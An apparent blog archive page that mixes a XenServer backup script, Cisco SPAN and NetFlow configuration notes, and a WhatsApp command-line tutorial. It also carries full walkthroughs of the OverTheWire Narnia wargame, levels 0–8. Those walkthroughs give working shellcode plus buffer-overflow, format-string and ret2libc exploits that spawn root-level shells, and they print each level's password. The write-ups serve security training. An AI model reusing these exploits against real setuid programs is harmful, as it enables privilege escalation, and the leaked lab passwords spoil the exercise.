hacktracking: February 2013

# XenServer virtual machine backup script

# cat vm_backup.script
#!/bin/bash

xenserver_name="$1"
vm_name="$2"
nfs_backup_path="/backup/vm"
email="notifications@lab.net"

function notify {
  date=`/bin/date +"%F-%T"`
  file="/tmp/$date-$vm_name.error"
  /bin/echo "To: $email" > "$file"
  /bin/echo "From: $email" >> "$file"
  /bin/echo "Subject: $1 backup $xenserver_name" >> "$file"
  /bin/echo "" >> "$file"
  /bin/echo "$date $1: $2" >> "$file"
  /usr/sbin/ssmtp $email < $file
  /bin/rm -f $file
}

if [ -f $nfs_backup_path/$vm_name.backup ]; then
  /opt/xensource/bin/xe vm-shutdown name-label=$vm_name
  if [ "$?" -eq "0" ]; then
    /bin/mv $nfs_backup_path/$vm_name.backup $nfs_backup_path/$vm_name.backup.old
    /opt/xensource/bin/xe vm-export vm=$vm_name filename=$nfs_backup_path/$vm_name.backup > /dev/null
    if [ "$?" -eq "0" ]; then
      uuid_1=`/opt/xensource/bin/xe vm-list name-label=$vm_name | /bin/grep uuid | /bin/awk '{print $5}'`
      result="`/opt/xensource/bin/xe vm-import filename=$nfs_backup_path/$vm_name.backup`"
      if [ "`/bin/echo -n "$result" | /bin/grep '-'`" != "" ]; then
        uuid_2=`/opt/xensource/bin/xe vm-list name-label=$vm_name | /bin/grep uuid | /bin/grep -v $uuid_1 | /bin/awk '{print $5}'`
        /opt/xensource/bin/xe vm-uninstall uuid=$uuid_2 force=true
        /opt/xensource/bin/xe vm-start name-label=$vm_name
        if [ "$?" -eq "0" ]; then
          notify "OK" "Backup $vm_name" > /dev/null
        else
          notify "ERROR" "/opt/xensource/bin/xe vm-start name-label=$vm_name" > /dev/null
        fi
      else
        /bin/mv $nfs_backup_path/$vm_name.backup.old $nfs_backup_path/$vm_name.backup
        /opt/xensource/bin/xe vm-start name-label=$vm_name
        notify "ERROR" "/opt/xensource/bin/xe vm-import filename=$nfs_backup_path/$vm_name.backup" > /dev/null
      fi
    else
      /bin/mv $nfs_backup_path/$vm_name.backup.old $nfs_backup_path/$vm_name.backup
      /opt/xensource/bin/xe vm-start name-label=$vm_name
      notify "ERROR" "/opt/xensource/bin/xe vm-export vm=$vm_name filename=$nfs_backup_path/$vm_name.backup" > /dev/null
    fi
  else
    notify "ERROR" "/opt/xensource/bin/xe vm-shutdown name-label=$vm_name" > /dev/null
  fi
else
  notify "ERROR" "$nfs_backup_path/$vm_name.backup does not exist" > /dev/null
fi
# ./vm_backup.script XS01 vserver.lab.net

# Narnia wargame: Level 8

# ssh narnia8@narnia.labs.overthewire.org
narnia8@narnia.labs.overthewire.org's password:6d6f6874687570686f67

narnia8@melissa$ file /narnia/narnia8
/narnia/narnia8: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia8@melissa$ cat /narnia/narnia8.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;

void func(char *b){
        char *blah=b;
        char bok[20];
        //int i=0;

        memset(bok, '\0', sizeof(bok));
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        printf("%s\n",bok);
}

int main(int argc, char **argv){

        if(argc > 1)
                func(argv[1]);
        else
        printf("%s argument\n", argv[0]);

        return 0;
}
narnia8@melissa$ mkdir /tmp/n8
narnia8@melissa$ cd /tmp/n8
narnia8@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia8@melissa$ ./getenvaddr EGG /narnia/narnia8
EGG will be at 0xffffd97d
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "A"x20 . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\x7d\xd9\xff\xff"'`
AAAAAAAAAAAAAAAAAAAAëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa:/tmp/n8$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xeb\x04" . "\xeb\xd8\xff\xff" . "\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1À°                     ÿÿëØÿÿëØÿÿíþ÷
   Rh//shh/binãëëØÿÿRâSáÍ           ô/ý÷


$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa$ ln -s /bin/sh sh
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x50\x68\x2e\x2f\x73\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1ÀPh./shãPâSá°            ÿÿëØÿÿëØÿÿíþ÷
              ÍëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165

# Narnia wargame: Level 7

# ssh narnia7@narnia.labs.overthewire.org
narnia7@narnia.labs.overthewire.org's password:61686b69617a69706875

narnia7@melissa$ file /narnia/narnia7
/narnia/narnia7: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia7@melissa$ cat /narnia/narnia7.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s \n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
        fflush(stdout);
        system("/bin/sh");

        return 0;
}
narnia7@melissa$ /narnia/narnia7 `perl -e 'print "\x9c\xd6\xff\xff" . "%x%x%x%x%.134514310d%n"'`
goodfunction() = 0x804867b
hackedfunction() = 0x80486a1

before : ptrf() = 0x804867b (0xffffd69c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ /usr/bin/whoami
narnia8
$ /bin/cat /etc/narnia_pass/narnia8
6d6f6874687570686f67

# Narnia wargame: Level 6

# ssh narnia6@narnia.labs.overthewire.org
narnia6@narnia.labs.overthewire.org's password:6e65657a6f6361656e67

narnia6@melissa$ file /narnia/narnia6
/narnia/narnia6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia6@melissa$ cat /narnia/narnia6.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[]){
        char b1[8], b2[8];
        int  (*fp)(char *)=(int(*)(char *))&puts, i;

        if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

        /* clear environ */
        for(i=0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));
        /* clear argz    */
        for(i=3; argv[i] != NULL; i++)
                memset(argv[i], '\0', strlen(argv[i]));

        strcpy(b1,argv[1]);
        strcpy(b2,argv[2]);
        if(((unsigned long)fp & 0xff000000) == 0xff000000)
                exit(-1);
        fp(b1);

        exit(1);
}
narnia6@melissa$ gdb -q /narnia/narnia6
(gdb) run a b
Starting program: /narnia/narnia6 a b
a

Program exited with code 01.
(gdb) break system
Breakpoint 1 at 0xf7eaf260
(gdb) quit
narnia6@melissa$ /narnia/narnia6 `perl -e 'print "a"x8 . "\x60\xf2\xea\xf7"'` `perl -e 'print "a"x8 . "/bin/sh"'`
$ /usr/bin/whoami
narnia7
$ /bin/cat /etc/narnia_pass/narnia7
61686b69617a69706875

# Narnia wargame: Level 5

# ssh narnia5@narnia.labs.overthewire.org
narnia5@narnia.labs.overthewire.org's password:6661696d616863686979

narnia5@melissa$ file /narnia/narnia5
/narnia/narnia5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia5@melissa$ cat /narnia/narnia5.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
        int i = 1;
        char buffer[64];

        snprintf(buffer, sizeof buffer, argv[1]);
        buffer[sizeof (buffer) - 1] = 0;
        printf("Change i's value from 1 -> 500. ");

        if(i==500){
                printf("GOOD\n");
                system("/bin/sh");
        }

        printf("No way...let me give you a hint!\n");
        printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
        printf ("i = %d (%p)\n", i, &i);
        return 0;
}
narnia5@melissa$ /narnia/narnia5 `perl -e 'print "\x3c\xd7\xff\xff" . "%x%x%x%.471d%n"'`
Change i's value from 1 -> 500. GOOD
$ /usr/bin/whoami
narnia6
$ /bin/cat /etc/narnia_pass/narnia6
6e65657a6f6361656e67

# Narnia wargame: Level 4

# ssh narnia4@narnia.labs.overthewire.org
narnia4@narnia.labs.overthewire.org's password:746861656e6f68746169

narnia4@melissa$ file /narnia/narnia4
/narnia/narnia4: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia4@melissa$ cat /narnia/narnia4.c
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
        int i;
        char buffer[256];

        for(i = 0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));

        if(argc>1)
                strcpy(buffer,argv[1]);

        return 0;
}
narnia4@melissa$ /narnia/narnia4 `perl -e 'print "\x90"x206 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xd0\xd4\xff\xff"x40'`
$ /usr/bin/whoami
narnia5
$ /bin/cat /etc/narnia_pass/narnia5
6661696d616863686979

# Narnia wargame: Level 3

# ssh narnia3@narnia.labs.overthewire.org
narnia3@narnia.labs.overthewire.org's password:766165717565657a6565

narnia3@melissa$ file /narnia/narnia3
/narnia/narnia3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia3@melissa$ cat /narnia/narnia3.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}
narnia3@melissa$ mkdir -p /tmp/narnia3--------------------/tmp
narnia3@melissa$ ln -s /etc/narnia_pass/narnia4 /tmp/narnia3--------------------/tmp/n4pw
narnia3@melissa$ touch /tmp/n4pw
narnia3@melissa$ chmod 666 /tmp/n4pw
narnia3@melissa$ /narnia/narnia3 /tmp/narnia3--------------------/tmp/n4pw
copied contents of /tmp/narnia3--------------------/tmp/n4pw to a safer place... (/tmp/n4pw)
narnia3@melissa$ cat /tmp/n4pw
746861656e6f68746169

# Narnia wargame: Level 2

# ssh narnia2@narnia.labs.overthewire.org
narnia2@narnia.labs.overthewire.org's password:6e616972696570656375

narnia2@melissa$ file /narnia/narnia2
/narnia/narnia2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia2@melissa$ cat /narnia/narnia2.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
        char buf[128];

        if(argc == 1){
                printf("Usage: %s argument\n", argv[0]);
                exit(1);
        }
        strcpy(buf,argv[1]);
        printf("%s", buf);

        return 0;
}
narnia2@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia2@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}
narnia2@melissa$ gcc -m32 -o getenvaddr getenvaddr.c
narnia2@melissa$ ./getenvaddr EGG /narnia/narnia2
EGG will be at 0xffffd97d
narnia2@melissa$ /narnia/narnia2 `perl -e 'print "\x90"x140 . "\x7d\xd9\xff\xff"'`
$ /usr/bin/whoami
narnia3
$ /bin/cat /etc/narnia_pass/narnia3
766165717565657a6565

# Narnia wargame: Level 1

# cat mycat.asm
BITS 32
xor eax,eax
cdq
mov byte al,11
push edx
push long 0x7461632f ; tac/
push long 0x6e69622f ; nib/
mov ebx,esp
push edx
push long 0x3261696e ; 2ain
push long 0x72616e2f ; ran/
push long 0x73736170 ; ssap
push long 0x5f61696e ; _ain
push long 0x72616e2f ; nar/
push long 0x6374652f ; cte/
mov ecx,esp
push edx
mov edx,esp
push ecx
push ebx
mov ecx,esp
int 0x80
# nasm -f elf mycat.asm && ld -o mycat mycat.o
# od2sc mycat
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"

# ssh narnia1@narnia.labs.overthewire.org
narnia1@narnia.labs.overthewire.org's password:65666569646965646165

narnia1@melissa$ file /narnia/narnia1
/narnia/narnia1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia1@melissa$ cat /narnia/narnia1.c
#include <stdio.h>

int main(){
        int (*ret)();

        if(getenv("EGG")==NULL){
                printf("Give me something to execute at the env-variable EGG\n");
                exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();

        return 0;
}
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
6e616972696570656375
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
$ /usr/bin/whoami
narnia2
$ /bin/cat /etc/narnia_pass/narnia2
6e616972696570656375

# Narnia wargame: Level 0

# ssh narnia0@narnia.labs.overthewire.org
narnia0@narnia.labs.overthewire.org's password:6e61726e696130

narnia0@melissa$ file /narnia/narnia0
/narnia/narnia0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia0@melissa$ cat /narnia/narnia0.c
#include <stdio.h>
#include <stdlib.h>

int main(){
        long val=0x41414141;
        char buf[20];

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef)
                system("/bin/sh");
        else {
                printf("WAY OFF!!!!\n");
                exit(1);
        }

        return 0;
}
narnia0@melissa$ perl -e 'print "a"x20 . "\xef\xbe\xad\xde"'
aaaaaaaaaaaaaaaaaaaaï¾Þnarnia0@melissa$ cat | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
aaaaaaaaaaaaaaaaaaaaï¾Þ
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾Þ
val: 0xdeadbeef
/usr/bin/whoami
narnia1
/bin/cat /etc/narnia_pass/narnia1
65666569646965646165
^C
narnia0@melissa$ (perl -e 'print "a"x20 . "\xef\xbe\xad\xde"' ; echo "/usr/bin/whoami" ; echo "/bin/cat /etc/narnia_pass/narnia1") | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾Þ
val: 0xdeadbeef
narnia1
65666569646965646165
narnia0@melissa$ (((echo -e "aaaaaaaaaaaaaaaaaaaa\xef\xbe\xad\xde" ; exit) ; echo "/usr/bin/whoami") ; echo "/bin/cat /etc/narnia_pass/narnia1") | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾Þ
val: 0xdeadbeef
narnia1
65666569646965646165

Understanding how the Mini Protocol Analyzer works

- Release 12.2(33)SXI and later releases support the Mini Protocol Analyzer feature.
- Captures network traffic from a SPAN session and stores the captured packet in a local memory buffer.
- You can limit the captured packets from selected VLANs, ACLs, MACs, ethertype or packet size.
- You can start and stop the capture using immediate commands, or schedule the capture to begin at a specified date and time.
- The captured data can be displayed on the console, stored to a local file system, or exported to an external server.
- By default, only the first 68 bytes of each packet are captured.
- Only one capture session is supported.

Configuration

Switch(config)# monitor session 1 type capture
Switch(config-mon-capture)# description Mini Protocol Analyzer session
Switch(config-mon-capture)# buffer-size 1024 ! The default is 2048 KB
Switch(config-mon-capture)# rate-limit 1000 ! The default is 10000 packets per second
Switch(config-mon-capture)# source interface gi1/1 both
Switch(config-mon-capture)# filter access-group capture_acl
Switch(config-mon-capture)# filter vlan 100
Switch(config-mon-capture)# filter ethertype 0x0800 ! IPv4 packets
Switch(config-mon-capture)# filter length 0 1024 ! Between 0 and 1024 bytes
Switch(config-mon-capture)# filter mac-address aabb.ccdd.eeff

Starting and stopping a capture

The capture ends when one of the following conditions occurs:

- A stop or clear command is executed.
- The capture buffer becomes full, unless it is configured as a circular buffer.
- The number of seconds has elapsed.
- The number of packets has been captured.

Switch# monitor capture linear start
Switch# monitor capture linear start for 10 seconds
Switch# monitor capture linear start schedule at 22:00:00 11 feb 2013

Displaying and exporting the capture buffer

Switch# show monitor capture
Switch# show monitor capture status
Switch# show monitor capture buffer 1 detail
Switch# show monitor capture buffer 1 brief
Switch# monitor capture export buffer disk0:capture_file.cap

# Configuring Local SPAN, RSPAN and ERSPAN

Switched Port ANalyzer (SPAN)

- Monitors all traffic, including multicast and BPDUs.
- 2 local SPAN source sessions.
- 128 sources per session.
- 64 destinations per session.

Switch(config)# monitor session 1 type local
Switch(config-mon-local)# description SPAN session
Switch(config-mon-local)# source interface gi1/1-4 both
Switch(config-mon-local)# destination interface gi2/1
Switch(config-mon-local)# no shut

Switch(config)# monitor session 1 source interface gi1/1-4 both
Switch(config)# monitor session 1 destination interface gi2/1

Remote SPAN (RSPAN)

- Uses a Layer 2 VLAN to carry SPAN traffic between switches.
- Does not monitor BPDUs.
- 2 RSPAN source sessions.
- 64 RSPAN destination sessions.
- 128 sources per session and 1 RSPAN VLAN.
- 64 destinations per session.
- Any network device that supports RSPAN VLANs can be an RSPAN intermediate device.
- MAC address learning is disabled in the RSPAN VLAN.

Switch1(config)# monitor session 1 type rspan-source
Switch1(config-mon-rspan-src)# description RSPAN session - source
Switch1(config-mon-rspan-src)# source interface gi1/1-4 both
Switch1(config-mon-rspan-src)# destination remote vlan 666
Switch1(config-mon-rspan-src)# no shut
Switch2(config)# monitor session 1 type rspan-destination
Switch2(config-mon-rspan-dst)# description RSPAN session - destination
Switch2(config-mon-rspan-dst)# source remote vlan 666
Switch2(config-mon-rspan-dst)# destination interface gi2/1
Switch2(config-mon-rspan-dst)# no shut

Switch1(config)# monitor session 1 source interface gi1/1-4 both
Switch1(config)# monitor session 1 destination remote vlan 666
Switch2(config)# monitor session 1 source remote vlan 666
Switch2(config)# monitor session 1 destination interface gi2/1

Encapsulated RSPAN (ERSPAN)

- Uses a GRE tunnel to carry traffic between switches.
- Adds 50 byte header.
- DF bit is set to prevent fragmentation.
- ERSPAN ID differentiates from various different ERSPAN source sessions.
- Monitors all traffic, including multicast and BPDUs.
- 2 ERSPAN source sessions.
- 24 ERSPAN destination sessions.
- 128 sources per session and 1 IP address.
- 64 destinations per session.

Switch1(config)# monitor session 1 type erspan-source
Switch1(config-mon-erspan-src)# description ERSPAN session - source
Switch1(config-mon-erspan-src)# source interface gi1/1-4 both
Switch1(config-mon-erspan-src)# destination
Switch1(config-mon-erspan-src-dst)# ip address 10.2.2.2
Switch1(config-mon-erspan-src-dst)# erspan-id 111
Switch1(config-mon-erspan-src-dst)# origin ip address 10.1.1.1
Switch1(config-mon-erspan-src-dst)# ip ttl 5
Switch1(config-mon-erspan-src)# no shut
Switch2(config)# monitor session 1 type erspan-destination
Switch2(config-mon-erspan-dst)# description ERSPAN session - destination
Switch2(config-mon-erspan-dst)# source
Switch2(config-mon-erspan-dst-src)# ip address 10.2.2.2
Switch2(config-mon-erspan-dst-src)# erspan-id 111
Switch2(config-mon-erspan-dst)# destination interface gi2/1
Switch2(config-mon-erspan-dst)# no shut

Source trunk VLAN filtering

Switch(config)# monitor session 1 filter vlan 1-5,10

Destination trunk VLAN filtering

Switch(config)# interface gi2/1
Switch(config-if)# switchport
Switch(config-if)# switchport encapsulation dot1q
Switch(config-if)# switchport mode trunk
Switch(config-if)# switchport trunk allowed vlan 10

Destination port permit lists

Switch(config)# monitor permit-list
Switch(config)# monitor permit-list destination interface gi2/2-4
Switch# show monitor permit-list

Notes

- SPAN does not copy the encapsulation from trunk sources. You can configure SPAN destinations as trunks to tag the monitored traffic before it is transmitted for analysis.
- Traffic that enters a VLAN through a Layer 3 VLAN interface is monitored when it is transmitted through an egress port that is in the source VLAN.
- Destination etherchannels do not support PAgP or LACP protocols, only the on mode.
- You can connect member links of a destination etherchannel to separate network analyzers.
- SPAN consumes too many switch and network resources to enable permanently.

# NetFlow configuration on Catalyst and Nexus switches

Background information

- The NetFlow cache on the Multilayer Switch Feature Card (MSFC) captures statistics for flows routed in software.
- The NetFlow cache on the Policy Feature Card (PFC) captures statistics for flows routed in hardware.
- A flow mask defines the format of a cache entry in the NetFlow cache table.
- You need to configure Netflow Data Export (NDE) to export NetFlow statistics to a NetFlow collector.

Catalyst NetFlow configuration

- MSFC configuration

Catalyst(config)# interface vlan10
Catalyst(config-if)# ip route-cache flow
Catalyst(config)# ip flow-export version 5
Catalyst(config)# ip flow-cache timeout active 5 ! Delete active cache entries after 5 minutes
Catalyst(config)# ip flow-cache timeout inactive 15 ! Delete inactive cache entries after 15 seconds

- PFC configuration

Catalyst(config)# mls netflow
Catalyst(config)# mls flow ip full-interface ! Flow mask on the PFC
Catalyst(config)# mls nde sender version 5
Catalyst(config)# mls aging fast ! Default threshold = 100 packets, and timeout = 32 seconds
Catalyst(config)# mls aging long 300 ! Delete active cache entries after 5 minutes
Catalyst(config)# mls aging normal 15 ! Delete inactive cache entries after 15 seconds

- Common configuration

Catalyst(config)# snmp-server ifindex persist
Catalyst(config)# ip flow-export source loopback0
Catalyst(config)# ip flow-export destination 10.0.0.1 9995

- Checks

Catalyst# show ip flow export
Catalyst# show ip cache flow
Catalyst# show mls nde
Catalyst# show snmp mib ifmib ifindex

Nexus NetFlow configuration

- Configuration

Nexus(config)# feature netflow
Nexus(config)# flow exporter collector
Nexus(config-flow-exporter)# description export netflow to collector
Nexus(config-flow-exporter)# destination 10.0.0.1
Nexus(config-flow-exporter)# version 5
Nexus(config-flow-exporter)# source loopback0
Nexus(config-flow-exporter)# transport udp 9995
Nexus(config)# flow monitor monitor_nexus
Nexus(config-flow-monitor)# exporter collector
Nexus(config-flow-monitor)# record netflow-original
Nexus(config)# int vlan10
Nexus(config-if)# ip flow monitor monitor_nexus input
Nexus(config)# flow timeout active 300
Nexus(config)# flow timeout inactive 15

- Checks

Nexus# show flow monitor monitor_nexus
Nexus# show flow exporter collector
Nexus# show flow record netflow-original
Nexus# show hardware flow ip
Nexus# show interface snmp-ifindex

# yowsup-cli: Send Whatsapp messages from command-line

Installation and configuration

# apt-get install python python-dateutil python-argparse
# wget https://github.com/tgalal/yowsup/archive/master.zip
# unzip master.zip
# cd yowsup-master/src
# cp config.example yowsup-cli.config
# cat yowsup-cli.config
cc=34
phone=34123456789
id=
password=
# chmod +x yowsup-cli
# ./yowsup-cli --requestcode sms --config yowsup-cli.config
status: sent
retry_after: 3605
length: 6
method: sms
# ./yowsup-cli --register 123-456 --config yowsup-cli.config
status: ok
kind: free
pw: S1nBGCvZhb6TBQrbm2sQCfSLkXM=
price: 0,89
price_expiration: 1362803446
currency: EUR
cost: 0.89
expiration: 1391344106
login: 34123456789
type: new
# cat yowsup-cli.config
cc=34
phone=34123456789     
id=
password=S1nBGCvZhb6TBQrbm2sQCfSLkXM=

Send a message

# ./yowsup-cli --send 34111222333 "Test message" --wait --config yowsup-cli.config
Connecting to c.whatsapp.net
Authed 34123456789
Sent message
Got sent receipt

Receive messages

# ./yowsup-cli --listen --autoack --keepalive --config yowsup-cli.config
Connecting to c.whatsapp.net
Authed 34123456789
34111222333@s.whatsapp.net [02-02-2013 14:14]:I have received a test message from you

Interactive: Send and receive messages

# ./yowsup-cli --interactive 34111222333 --wait --autoack --keepalive --config yowsup-cli.config
Connecting to c.whatsapp.net
Authed 34123456789
Starting Interactive chat with 34111222333
Enter Message or command: (/available, /lastseen, /unavailable)
Yes, I know it
34123456789 [02-02-2013 14:15]:Yes, I know it
Enter Message or command: (/available, /lastseen, /unavailable)
34111222333@s.whatsapp.net [02-02-2013 14:16]:What are you doing?
Enter Message or command: (/available, /lastseen, /unavailable)
Testing a new application
34123456789 [02-02-2013 14:16]:Testing a new application
Enter Message or command: (/available, /lastseen, /unavailable)
/unavailable

References

https://github.com/tgalal/yowsup
http://www.fonyou.es